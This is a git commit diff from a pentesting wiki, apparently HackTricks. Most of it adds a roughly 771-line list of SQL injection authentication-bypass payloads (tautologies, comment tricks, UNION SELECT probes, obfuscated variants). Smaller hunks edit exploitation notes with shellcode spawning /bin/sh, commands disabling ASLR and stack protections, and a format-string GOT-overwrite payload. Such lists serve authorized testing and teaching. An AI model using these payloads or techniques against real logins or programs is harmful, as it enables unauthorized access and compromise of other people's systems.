GitBook: [#3038] No subject

This commit is contained in:
CPol 2022-02-28 09:13:08 +00:00 committed by gitbook-bot
parent 7531c4a316
commit 42ee735ece
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
61 changed files with 1121 additions and 186 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 72 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 44 KiB

After

Width:  |  Height:  |  Size: 32 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 93 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 766 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 766 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 740 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

View file

@ -0,0 +1,771 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
'
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or 1=1
or true
' or ''='
" or ""="
1) and '1='1
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1
' and 'one'='one
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0
' or 0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0
" or 0=0 --
" or 0=0 #
" or 0=0
%' or '0'='0
or 1=1
or 1=1--
or 1=1/*
or 1=1#
or 1=1
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1='1
' or 1=1
' or 1=1 --
' or 1=1
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1='1
) or ('1='1
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
==
=
'
"
'-- 2
'/*
'#
"-- 2
" #
"/*
'-'
'&'
'^'
'*'
'='
0'<'2
"-"
"&"
"^"
"*"
"="
0"<"2
')
")
')-- 2
')/*
')#
")-- 2
") #
")/*
')-('
')&('
')^('
')*('
')=('
0')<('2
")-("
")&("
")^("
")*("
")=("
0")<("2
'-''-- 2
'-''#
'-''/*
'&''-- 2
'&''#
'&''/*
'^''-- 2
'^''#
'^''/*
'*''-- 2
'*''#
'*''/*
'=''-- 2
'=''#
'=''/*
0'<'2'-- 2
0'<'2'#
0'<'2'/*
"-""-- 2
"-""#
"-""/*
"&""-- 2
"&""#
"&""/*
"^""-- 2
"^""#
"^""/*
"*""-- 2
"*""#
"*""/*
"=""-- 2
"=""#
"=""/*
0"<"2"-- 2
0"<"2"#
0"<"2"/*
')-''-- 2
')-''#
')-''/*
')&''-- 2
')&''#
')&''/*
')^''-- 2
')^''#
')^''/*
')*''-- 2
')*''#
')*''/*
')=''-- 2
')=''#
')=''/*
0')<'2'-- 2
0')<'2'#
0')<'2'/*
")-""-- 2
")-""#
")-""/*
")&""-- 2
")&""#
")&""/*
")^""-- 2
")^""#
")^""/*
")*""-- 2
")*""#
")*""/*
")=""-- 2
")=""#
")=""/*
0")<"2-- 2
0")<"2#
0")<"2/*
'oR'2
'oR'2'-- 2
'oR'2'#
'oR'2'/*
'oR'2'oR'
'oR(2)-- 2
'oR(2)#
'oR(2)/*
'oR(2)oR'
'oR 2-- 2
'oR 2#
'oR 2/*
'oR 2 oR'
'oR/**/2-- 2
'oR/**/2#
'oR/**/2/*
'oR/**/2/**/oR'
"oR"2
"oR"2"-- 2
"oR"2"#
"oR"2"/*
"oR"2"oR"
"oR(2)-- 2
"oR(2)#
"oR(2)/*
"oR(2)oR"
"oR 2-- 2
"oR 2#
"oR 2/*
"oR 2 oR"
"oR/**/2-- 2
"oR/**/2#
"oR/**/2/*
"oR/**/2/**/oR"
'oR'2'='2
'oR'2'='2'oR'
'oR'2'='2'-- 2
'oR'2'='2'#
'oR'2'='2'/*
'oR'2'='2'oR'
'oR 2=2-- 2
'oR 2=2#
'oR 2=2/*
'oR 2=2 oR'
'oR/**/2=2-- 2
'oR/**/2=2#
'oR/**/2=2/*
'oR/**/2=2/**/oR'
'oR(2)=2-- 2
'oR(2)=2#
'oR(2)=2/*
'oR(2)=2/*
'oR(2)=(2)oR'
'oR'2'='2' LimIT 1-- 2
'oR'2'='2' LimIT 1#
'oR'2'='2' LimIT 1/*
'oR(2)=(2)LimIT(1)-- 2
'oR(2)=(2)LimIT(1)#
'oR(2)=(2)LimIT(1)/*
"oR"2"="2
"oR"2"="2"oR"
"oR"2"="2"-- 2
"oR"2"="2"#
"oR"2"="2"/*
"oR"2"="2"oR"
"oR 2=2-- 2
"oR 2=2#
"oR 2=2/*
"oR 2=2 oR"
"oR/**/2=2-- 2
"oR/**/2=2#
"oR/**/2=2/*
"oR/**/2=2/**/oR"
"oR(2)=2-- 2
"oR(2)=2#
"oR(2)=2/*
"oR(2)=2/*
"oR(2)=(2)oR"
"oR"2"="2" LimIT 1-- 2
"oR"2"="2" LimIT 1#
"oR"2"="2" LimIT 1/*
"oR(2)=(2)LimIT(1)-- 2
"oR(2)=(2)LimIT(1)#
"oR(2)=(2)LimIT(1)/*
'oR true-- 2
'oR true#
'oR true/*
'oR true oR'
'oR(true)-- 2
'oR(true)#
'oR(true)/*
'oR(true)oR'
'oR/**/true-- 2
'oR/**/true#
'oR/**/true/*
'oR/**/true/**/oR'
"oR true-- 2
"oR true#
"oR true/*
"oR true oR"
"oR(true)-- 2
"oR(true)#
"oR(true)/*
"oR(true)oR"
"oR/**/true-- 2
"oR/**/true#
"oR/**/true/*
"oR/**/true/**/oR"
'oR'2'LiKE'2
'oR'2'LiKE'2'-- 2
'oR'2'LiKE'2'#
'oR'2'LiKE'2'/*
'oR'2'LiKE'2'oR'
'oR(2)LiKE(2)-- 2
'oR(2)LiKE(2)#
'oR(2)LiKE(2)/*
'oR(2)LiKE(2)oR'
"oR"2"LiKE"2
"oR"2"LiKE"2"-- 2
"oR"2"LiKE"2"#
"oR"2"LiKE"2"/*
"oR"2"LiKE"2"oR"
"oR(2)LiKE(2)-- 2
"oR(2)LiKE(2)#
"oR(2)LiKE(2)/*
"oR(2)LiKE(2)oR"
admin
admin'-- 2
admin'#
admin'/*
admin"-- 2
admin"#
ffifdyop
' UniON SElecT 1,2-- 2
' UniON SElecT 1,2,3-- 2
' UniON SElecT 1,2,3,4-- 2
' UniON SElecT 1,2,3,4,5-- 2
' UniON SElecT 1,2#
' UniON SElecT 1,2,3#
' UniON SElecT 1,2,3,4#
' UniON SElecT 1,2,3,4,5#
'UniON(SElecT(1),2)-- 2
'UniON(SElecT(1),2,3)-- 2
'UniON(SElecT(1),2,3,4)-- 2
'UniON(SElecT(1),2,3,4,5)-- 2
'UniON(SElecT(1),2)#
'UniON(SElecT(1),2,3)#
'UniON(SElecT(1),2,3,4)#
'UniON(SElecT(1),2,3,4,5)#
" UniON SElecT 1,2-- 2
" UniON SElecT 1,2,3-- 2
" UniON SElecT 1,2,3,4-- 2
" UniON SElecT 1,2,3,4,5-- 2
" UniON SElecT 1,2#
" UniON SElecT 1,2,3#
" UniON SElecT 1,2,3,4#
" UniON SElecT 1,2,3,4,5#
"UniON(SElecT(1),2)-- 2
"UniON(SElecT(1),2,3)-- 2
"UniON(SElecT(1),2,3,4)-- 2
"UniON(SElecT(1),2,3,4,5)-- 2
"UniON(SElecT(1),2)#
"UniON(SElecT(1),2,3)#
"UniON(SElecT(1),2,3,4)#
"UniON(SElecT(1),2,3,4,5)#
'||'2
'||2-- 2
'||'2'||'
'||2#
'||2/*
'||2||'
"||"2
"||2-- 2
"||"2"||"
"||2#
"||2/*
"||2||"
'||'2'='2
'||'2'='2'||'
'||2=2-- 2
'||2=2#
'||2=2/*
'||2=2||'
"||"2"="2
"||"2"="2"||"
"||2=2-- 2
"||2=2#
"||2=2/*
"||2=2||"
'||2=(2)LimIT(1)-- 2
'||2=(2)LimIT(1)#
'||2=(2)LimIT(1)/*
"||2=(2)LimIT(1)-- 2
"||2=(2)LimIT(1)#
"||2=(2)LimIT(1)/*
'||true-- 2
'||true#
'||true/*
'||true||'
"||true-- 2
"||true#
"||true/*
"||true||"
'||'2'LiKE'2
'||'2'LiKE'2'-- 2
'||'2'LiKE'2'#
'||'2'LiKE'2'/*
'||'2'LiKE'2'||'
'||(2)LiKE(2)-- 2
'||(2)LiKE(2)#
'||(2)LiKE(2)/*
'||(2)LiKE(2)||'
"||"2"LiKE"2
"||"2"LiKE"2"-- 2
"||"2"LiKE"2"#
"||"2"LiKE"2"/*
"||"2"LiKE"2"||"
"||(2)LiKE(2)-- 2
"||(2)LiKE(2)#
"||(2)LiKE(2)/*
"||(2)LiKE(2)||"
')oR('2
')oR'2'-- 2
')oR'2'#
')oR'2'/*
')oR'2'oR('
')oR(2)-- 2
')oR(2)#
')oR(2)/*
')oR(2)oR('
')oR 2-- 2
')oR 2#
')oR 2/*
')oR 2 oR('
')oR/**/2-- 2
')oR/**/2#
')oR/**/2/*
')oR/**/2/**/oR('
")oR("2
")oR"2"-- 2
")oR"2"#
")oR"2"/*
")oR"2"oR("
")oR(2)-- 2
")oR(2)#
")oR(2)/*
")oR(2)oR("
")oR 2-- 2
")oR 2#
")oR 2/*
")oR 2 oR("
")oR/**/2-- 2
")oR/**/2#
")oR/**/2/*
")oR/**/2/**/oR("
')oR'2'=('2
')oR'2'='2'oR('
')oR'2'='2'-- 2
')oR'2'='2'#
')oR'2'='2'/*
')oR'2'='2'oR('
')oR 2=2-- 2
')oR 2=2#
')oR 2=2/*
')oR 2=2 oR('
')oR/**/2=2-- 2
')oR/**/2=2#
')oR/**/2=2/*
')oR/**/2=2/**/oR('
')oR(2)=2-- 2
')oR(2)=2#
')oR(2)=2/*
')oR(2)=2/*
')oR(2)=(2)oR('
')oR'2'='2' LimIT 1-- 2
')oR'2'='2' LimIT 1#
')oR'2'='2' LimIT 1/*
')oR(2)=(2)LimIT(1)-- 2
')oR(2)=(2)LimIT(1)#
')oR(2)=(2)LimIT(1)/*
")oR"2"=("2
")oR"2"="2"oR("
")oR"2"="2"-- 2
")oR"2"="2"#
")oR"2"="2"/*
")oR"2"="2"oR("
")oR 2=2-- 2
")oR 2=2#
")oR 2=2/*
")oR 2=2 oR("
")oR/**/2=2-- 2
")oR/**/2=2#
")oR/**/2=2/*
")oR/**/2=2/**/oR("
")oR(2)=2-- 2
")oR(2)=2#
")oR(2)=2/*
")oR(2)=2/*
")oR(2)=(2)oR("
")oR"2"="2" LimIT 1-- 2
")oR"2"="2" LimIT 1#
")oR"2"="2" LimIT 1/*
")oR(2)=(2)LimIT(1)-- 2
")oR(2)=(2)LimIT(1)#
")oR(2)=(2)LimIT(1)/*
')oR true-- 2
')oR true#
')oR true/*
')oR true oR('
')oR(true)-- 2
')oR(true)#
')oR(true)/*
')oR(true)oR('
')oR/**/true-- 2
')oR/**/true#
')oR/**/true/*
')oR/**/true/**/oR('
")oR true-- 2
")oR true#
")oR true/*
")oR true oR("
")oR(true)-- 2
")oR(true)#
")oR(true)/*
")oR(true)oR("
")oR/**/true-- 2
")oR/**/true#
")oR/**/true/*
")oR/**/true/**/oR("
')oR'2'LiKE('2
')oR'2'LiKE'2'-- 2
')oR'2'LiKE'2'#
')oR'2'LiKE'2'/*
')oR'2'LiKE'2'oR('
')oR(2)LiKE(2)-- 2
')oR(2)LiKE(2)#
')oR(2)LiKE(2)/*
')oR(2)LiKE(2)oR('
")oR"2"LiKE("2
")oR"2"LiKE"2"-- 2
")oR"2"LiKE"2"#
")oR"2"LiKE"2"/*
")oR"2"LiKE"2"oR("
")oR(2)LiKE(2)-- 2
")oR(2)LiKE(2)#
")oR(2)LiKE(2)/*
")oR(2)LiKE(2)oR("
admin')-- 2
admin')#
admin')/*
admin")-- 2
admin")#
') UniON SElecT 1,2-- 2
') UniON SElecT 1,2,3-- 2
') UniON SElecT 1,2,3,4-- 2
') UniON SElecT 1,2,3,4,5-- 2
') UniON SElecT 1,2#
') UniON SElecT 1,2,3#
') UniON SElecT 1,2,3,4#
') UniON SElecT 1,2,3,4,5#
')UniON(SElecT(1),2)-- 2
')UniON(SElecT(1),2,3)-- 2
')UniON(SElecT(1),2,3,4)-- 2
')UniON(SElecT(1),2,3,4,5)-- 2
')UniON(SElecT(1),2)#
')UniON(SElecT(1),2,3)#
')UniON(SElecT(1),2,3,4)#
')UniON(SElecT(1),2,3,4,5)#
") UniON SElecT 1,2-- 2
") UniON SElecT 1,2,3-- 2
") UniON SElecT 1,2,3,4-- 2
") UniON SElecT 1,2,3,4,5-- 2
") UniON SElecT 1,2#
") UniON SElecT 1,2,3#
") UniON SElecT 1,2,3,4#
") UniON SElecT 1,2,3,4,5#
")UniON(SElecT(1),2)-- 2
")UniON(SElecT(1),2,3)-- 2
")UniON(SElecT(1),2,3,4)-- 2
")UniON(SElecT(1),2,3,4,5)-- 2
")UniON(SElecT(1),2)#
")UniON(SElecT(1),2,3)#
")UniON(SElecT(1),2,3,4)#
")UniON(SElecT(1),2,3,4,5)#
')||('2
')||2-- 2
')||'2'||('
')||2#
')||2/*
')||2||('
")||("2
")||2-- 2
")||"2"||("
")||2#
")||2/*
")||2||("
')||'2'=('2
')||'2'='2'||('
')||2=2-- 2
')||2=2#
')||2=2/*
')||2=2||('
")||"2"=("2
")||"2"="2"||("
")||2=2-- 2
")||2=2#
")||2=2/*
")||2=2||("
')||2=(2)LimIT(1)-- 2
')||2=(2)LimIT(1)#
')||2=(2)LimIT(1)/*
")||2=(2)LimIT(1)-- 2
")||2=(2)LimIT(1)#
")||2=(2)LimIT(1)/*
')||true-- 2
')||true#
')||true/*
')||true||('
")||true-- 2
")||true#
")||true/*
")||true||("
')||'2'LiKE('2
')||'2'LiKE'2'-- 2
')||'2'LiKE'2'#
')||'2'LiKE'2'/*
')||'2'LiKE'2'||('
')||(2)LiKE(2)-- 2
')||(2)LiKE(2)#
')||(2)LiKE(2)/*
')||(2)LiKE(2)||('
")||"2"LiKE("2
")||"2"LiKE"2"-- 2
")||"2"LiKE"2"#
")||"2"LiKE"2"/*
")||"2"LiKE"2"||("
")||(2)LiKE(2)-- 2
")||(2)LiKE(2)#
")||(2)LiKE(2)/*
")||(2)LiKE(2)||("
' UnION SELeCT 1,2`
' UnION SELeCT 1,2,3`
' UnION SELeCT 1,2,3,4`
' UnION SELeCT 1,2,3,4,5`
" UnION SELeCT 1,2`
" UnION SELeCT 1,2,3`
" UnION SELeCT 1,2,3,4`
" UnION SELeCT 1,2,3,4,5`

View file

@ -2,7 +2,7 @@
And more services: And more services:
ubiquiti-discover udp "Ubiquiti Networks Device" ubiquiti-discover udp "Ubiquiti Networks Device"&#x20;
dht udp "DHT Nodes" dht udp "DHT Nodes"
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>) ![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
InfluxDB InfluxDB

View file

@ -197,6 +197,9 @@
* [Network Protocols Explained (ESP)](pentesting/pentesting-network/network-protocols-explained-esp.md) * [Network Protocols Explained (ESP)](pentesting/pentesting-network/network-protocols-explained-esp.md)
* [IDS and IPS Evasion](pentesting/pentesting-network/ids-evasion.md) * [IDS and IPS Evasion](pentesting/pentesting-network/ids-evasion.md)
* [DHCPv6](pentesting/pentesting-network/dhcpv6.md) * [DHCPv6](pentesting/pentesting-network/dhcpv6.md)
* [Radio Hacking](pentesting/radio-hacking/README.md)
* [Pentesting RFID](pentesting/radio-hacking/pentesting-rfid.md)
* [Pentesting BLE - Bluetooth Low Energy](pentesting/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
* [Pentesting JDWP - Java Debug Wire Protocol](pentesting/pentesting-jdwp-java-debug-wire-protocol.md) * [Pentesting JDWP - Java Debug Wire Protocol](pentesting/pentesting-jdwp-java-debug-wire-protocol.md)
* [Pentesting Printers](pentesting/pentesting-printers/README.md) * [Pentesting Printers](pentesting/pentesting-printers/README.md)
* [Accounting bypass](pentesting/pentesting-printers/accounting-bypass.md) * [Accounting bypass](pentesting/pentesting-printers/accounting-bypass.md)

View file

@ -5,19 +5,19 @@
Aleatorización de direcciones Aleatorización de direcciones
**Desactiva aleatorizacion(ASLR) GLOBAL (root)**:\ **Desactiva aleatorizacion(ASLR) GLOBAL (root)**:\
echo 0 > /proc/sys/kernel/randomize_va_space\ echo 0 > /proc/sys/kernel/randomize\_va\_space\
Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize_va_space Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize\_va\_space
**Desactivar para una ejecución** (no requiere root):\ **Desactivar para una ejecución** (no requiere root):\
setarch \`arch\` -R ./ejemplo argumentos\ setarch \`arch\` -R ./ejemplo argumentos\
setarch \`uname -m\` -R ./ejemplo argumentos setarch \`uname -m\` -R ./ejemplo argumentos
**Desactivar protección de ejecución en pila**\ **Desactivar protección de ejecución en pila**\
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo
**Core file**\ **Core file**\
ulimit -c unlimited\ ulimit -c unlimited\
gdb /exec core_file\ gdb /exec core\_file\
/etc/security/limits.conf -> \* soft core unlimited /etc/security/limits.conf -> \* soft core unlimited
**Text**\ **Text**\
@ -61,7 +61,7 @@ objdump -d ./PROGRAMA | grep FUNCION
## ROP ## ROP
### Call to sys_execve ### Call to sys\_execve
{% content-ref url="rop-syscall-execv.md" %} {% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md) [rop-syscall-execv.md](rop-syscall-execv.md)
@ -69,15 +69,15 @@ objdump -d ./PROGRAMA | grep FUNCION
## **2.SHELLCODE** ## **2.SHELLCODE**
Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\__NR\_” Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_”
setreuid(0,0); // \__NR_setreuid 70\ setreuid(0,0); // \_\_NR\_setreuid 70\
execve(“/bin/sh”, args\[], NULL); // \__NR_execve 11\ execve(“/bin/sh”, args\[], NULL); // \_\_NR\_execve 11\
exit(0); // \__NR_exit 1 exit(0); // \_\_NR\_exit 1
xor eax, eax ; limpiamos eax\ xor eax, eax ; limpiamos eax\
xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\ xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\
mov al, 0x01 ; eax = 1 —> \__NR_exit 1\ mov al, 0x01 ; eax = 1 —> \_\_NR\_exit 1\
int 0x80 ; Ejecutar syscall int 0x80 ; Ejecutar syscall
**nasm -f elf assembly.asm** —> Nos devuelve un .o\ **nasm -f elf assembly.asm** —> Nos devuelve un .o\
@ -96,7 +96,7 @@ void main(){
}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span> }<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
``` ```
Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA_COMPILADO** Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO**
A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código. A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código.
@ -240,7 +240,7 @@ Otra técnica interesante es el uso de **mprotect()** la cual permite asignar lo
#### **Encadenamiento de funciones** #### **Encadenamiento de funciones**
Basándonos en la técnica anterior, esta forma de exploit consiste en:\ Basándonos en la técnica anterior, esta forma de exploit consiste en:\
Relleno + \&Función1 + \&pop;ret; + \&arg_fun1 + \&Función2 + \&pop;ret; + \&arg_fun2 + … Relleno + \&Función1 + \&pop;ret; + \&arg\_fun1 + \&Función2 + \&pop;ret; + \&arg\_fun2 + …
De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable** De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable**
@ -250,12 +250,12 @@ Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecuci
RELLENO RELLENO
* Situamos en el EBP un EBP falso que apunta a: 2º EBP_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) * Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) &#x20;
* En el EIP ponemos de dirección una función &(leave;ret) * En el EIP ponemos de dirección una función &(leave;ret)
Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP_falso + \&system() + &(leave;ret;) + &”/bin/sh” Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/sh”
el 2ºEBP sería: 3ºEBP_falso + \&system() + &(leave;ret;) + &”/bin/ls” el 2ºEBP sería: 3ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/ls”
Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria. Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria.
@ -283,7 +283,7 @@ Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el t
En linux todos los progamas se mapean comenzando en 0xbfffffff En linux todos los progamas se mapean comenzando en 0xbfffffff
Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE_ejecutable_completo) - strlen(shellcode) Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE\_ejecutable\_completo) - strlen(shellcode)
De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode. De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode.
@ -389,7 +389,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (621) (2).png>) ![](<../../.gitbook/assets/image (621) (1) (1) (1).png>)
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
@ -422,7 +422,7 @@ If HOB < LOB\
If HOB > LOB\ If HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB
\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` \`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\`
@ -434,7 +434,7 @@ You an find a **template** to exploit the GOT using format-strings here:
[format-strings-template.md](format-strings-template.md) [format-strings-template.md](format-strings-template.md)
{% endcontent-ref %} {% endcontent-ref %}
### **.fini_array** ### **.fini\_array**
Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**. Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
@ -492,7 +492,7 @@ Usually you will find the **DTOR** section **between** the values `ffffffff` and
Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
### **\__atexit Structures** ### **\_\_atexit Structures**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays is very **weird to exploit this**. Nowadays is very **weird to exploit this**.
@ -528,11 +528,11 @@ Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof
PaX dive el espacio de direcciones del proceso en 3 grupos: PaX dive el espacio de direcciones del proceso en 3 grupos:
